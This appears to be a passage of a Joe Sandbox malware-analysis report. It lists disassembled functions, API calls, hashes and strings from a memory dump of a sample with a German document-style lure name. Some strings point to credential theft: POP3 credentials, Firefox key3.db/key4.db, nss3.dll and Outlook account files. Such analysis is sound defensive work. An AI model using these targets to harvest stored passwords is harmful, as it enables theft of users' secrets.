                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Item$DialogMessageSend
                                                            • String ID:
                                                            • API String ID: 2485852401-0
                                                            • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                            • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                                            • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                            • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                                            APIs
                                                            • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                            • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                            • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                            • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                            • GetSysColor.USER32(0000000F), ref: 0040B472
                                                            • DeleteObject.GDI32(?), ref: 0040B4A6
                                                            • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                            • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$DeleteImageLoadObject$Color
                                                            • String ID:
                                                            • API String ID: 3642520215-0
                                                            • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                            • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                            • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                            • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                            APIs
                                                            • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405BE9
                                                            • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405C05
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C2B
                                                            • memset.MSVCRT ref: 00405C3B
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C6A
                                                            • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405CB7
                                                            • SetFocus.USER32(?,?,?,?), ref: 00405CC0
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405CD0
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                            • String ID:
                                                            • API String ID: 2313361498-0
                                                            • Opcode ID: 20fe0494e672a329d8c574fdcc403b16352a75b97cc0102977cb83616af43d0a
                                                            • Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
                                                            • Opcode Fuzzy Hash: 20fe0494e672a329d8c574fdcc403b16352a75b97cc0102977cb83616af43d0a
                                                            • Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94
                                                            APIs
                                                            • GetClientRect.USER32(?,?), ref: 0040BB33
                                                            • GetWindowRect.USER32(?,?), ref: 0040BB49
                                                            • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                                            • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                                            • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Window$Defer$Rect$BeginClient
                                                            • String ID:
                                                            • API String ID: 2126104762-0
                                                            • Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                            • Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
                                                            • Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                            • Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24
                                                            APIs
                                                            • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                            • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                            • GetDC.USER32(00000000), ref: 004072FB
                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                            • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                            • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                            • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                            • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                            • String ID:
                                                            • API String ID: 1999381814-0
                                                            • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                            • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                            • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                            • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpymemset
                                                            • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                            • API String ID: 1297977491-3883738016
                                                            • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                            • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                            • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                            • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                            APIs
                                                              • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                              • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                              • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                              • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                            • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                            • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                            • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                              • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                              • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                            • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                            • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                            • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset
                                                            • String ID: gj
                                                            • API String ID: 438689982-4203073231
                                                            • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                            • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                            • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                            • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                            APIs
                                                            • memset.MSVCRT ref: 0040DAE3
                                                            • memset.MSVCRT ref: 0040DAF7
                                                            • memset.MSVCRT ref: 0040DB0B
                                                              • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                              • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                              • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                                            • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpymemset$strlen$_memicmp
                                                            • String ID: user_pref("
                                                            • API String ID: 765841271-2487180061
                                                            • Opcode ID: 9f3536b0c4b6552aef583bc432abc8b8f220ef95764321c1a442fafe8de8c1cc
                                                            • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                                            • Opcode Fuzzy Hash: 9f3536b0c4b6552aef583bc432abc8b8f220ef95764321c1a442fafe8de8c1cc
                                                            • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                            • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                            • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                            • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                            • memset.MSVCRT ref: 004058C3
                                                            • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                            • SetFocus.USER32(?), ref: 00405976
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$FocusItemmemset
                                                            • String ID:
                                                            • API String ID: 4281309102-0
                                                            • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                            • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                            • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                            • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                            APIs
                                                              • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                              • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,75D50A60,00000000,?,?,0040A7BE,00000001,0044CBC0,75D50A60), ref: 00406D4D
                                                            • _mbscat.MSVCRT ref: 0040A8FF
                                                            • sprintf.MSVCRT ref: 0040A921
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FileWrite_mbscatsprintfstrlen
                                                            • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                            • API String ID: 1631269929-4153097237
                                                            • Opcode ID: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                                            • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                            • Opcode Fuzzy Hash: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                                            • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                            APIs
                                                            • memset.MSVCRT ref: 0040810E
                                                              • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                              • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                            • LocalFree.KERNEL32(?,?,?,?,?,00000000,76BAE430,?), ref: 004081B9
                                                              • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                              • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                              • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                            • String ID: POP3_credentials$POP3_host$POP3_name
                                                            • API String ID: 524865279-2190619648
                                                            • Opcode ID: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                            • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                            • Opcode Fuzzy Hash: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                            • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                            APIs
                                                            • memset.MSVCRT ref: 00406B8E
                                                            • strlen.MSVCRT ref: 00406B99
                                                            • strlen.MSVCRT ref: 00406BFF
                                                            • strlen.MSVCRT ref: 00406C0D
                                                            • strlen.MSVCRT ref: 00406BA7
                                                              • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                              • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: strlen$_mbscat_mbscpymemset
                                                            • String ID: key3.db$key4.db
                                                            • API String ID: 581844971-3557030128
                                                            • Opcode ID: 2f8350c5d3847b8345184316588304a55230d418217e1ade242334758e746451
                                                            • Instruction ID: ca97bc5828a50012869c36cbd7bca65918f6b78bc9695587552fe8d314e031cf
                                                            • Opcode Fuzzy Hash: 2f8350c5d3847b8345184316588304a55230d418217e1ade242334758e746451
                                                            • Instruction Fuzzy Hash: 4B210E3190811D6ADB10AA65DC41ECE77ACDB55318F1104BBF40DF60A1EE38DA958658
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$CountInfomemsetstrchr
                                                            • String ID: 0$6
                                                            • API String ID: 2300387033-3849865405
                                                            • Opcode ID: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                            • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                            • Opcode Fuzzy Hash: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                            • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                            APIs
                                                            • memset.MSVCRT ref: 004076D7
                                                            • sprintf.MSVCRT ref: 00407704
                                                            • strlen.MSVCRT ref: 00407710
                                                            • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                            • strlen.MSVCRT ref: 00407733
                                                            • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpystrlen$memsetsprintf
                                                            • String ID: %s (%s)
                                                            • API String ID: 3756086014-1363028141
                                                            • Opcode ID: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                            • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                            • Opcode Fuzzy Hash: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                            • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                            APIs
                                                            • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                            • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                            • CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                            Strings
                                                            • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                            • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FromStringUuid$FreeTaskmemcpy
                                                            • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                            • API String ID: 1640410171-3316789007
                                                            • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                            • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                            • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                            • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _mbscat$memsetsprintf
                                                            • String ID: %2.2X
                                                            • API String ID: 125969286-791839006
                                                            • Opcode ID: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                            • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                            • Opcode Fuzzy Hash: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                            • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                            APIs
                                                              • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                            • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                            • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                              • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                              • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                              • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                              • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                              • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                              • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                              • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                            • CloseHandle.KERNEL32(?), ref: 00444206
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                            • String ID: ACD
                                                            • API String ID: 1886237854-620537770
                                                            • Opcode ID: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                            • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                            • Opcode Fuzzy Hash: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                            • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                            APIs
                                                            • memset.MSVCRT ref: 004091EC
                                                            • sprintf.MSVCRT ref: 00409201
                                                              • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                              • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                              • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                            • SetWindowTextA.USER32(?,?), ref: 00409228
                                                            • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                            • String ID: caption$dialog_%d
